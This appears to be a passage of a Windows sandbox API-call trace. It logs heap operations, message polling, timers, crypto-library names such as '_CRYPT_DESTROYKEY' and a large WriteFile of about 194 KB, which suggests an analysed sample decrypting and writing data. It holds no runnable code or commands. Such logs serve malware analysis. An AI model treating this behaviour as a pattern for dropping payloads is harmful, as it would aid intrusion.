dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0161.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3c4ec70 [0161.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c1f660 | out: hHeap=0x970000) returned 1 [0161.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0161.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0161.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0161.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0161.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0161.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0161.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0161.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0161.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0161.053] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0161.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0161.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0161.053] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0161.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0161.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0161.053] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0161.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0161.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0161.054] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0161.054] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0161.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.054] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0161.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.055] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0161.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0161.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0161.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c1f660 | out: hHeap=0x970000) returned 1 [0161.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0161.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0161.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0161.262] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0161.262] TranslateMessage (lpMsg=0x8cf708) returned 0 [0161.263] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0161.263] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0161.263] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0161.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0161.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0161.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0161.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0161.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0161.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0161.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0161.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0161.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3c7e008 [0161.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0161.264] WriteFile (in: hFile=0x2a0, lpBuffer=0x3c7e008*, nNumberOfBytesToWrite=0x2f608, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3c7e008*, lpNumberOfBytesWritten=0x8cf5e4*=0x2f608, lpOverlapped=0x0) returned 1 [0161.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0161.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c7e008 | out: hHeap=0x970000) returned 1 [0161.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0161.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0161.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0161.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0161.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0161.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0161.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0161.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0161.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0161.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0161.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0161.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0161.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0161.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0161.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0161.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0161.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0161.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0161.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0161.274] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0161.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0161.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ea8 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0161.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0161.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0161.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0161.274] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0161.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0161.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0161.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0161.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0161.276] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0161.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0161.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0161.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0161.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0161.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0161.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0161.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0161.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0161.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0161.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0161.278] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0161.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0161.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0161.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0161.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0161.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0161.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0161.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0161.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50728, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 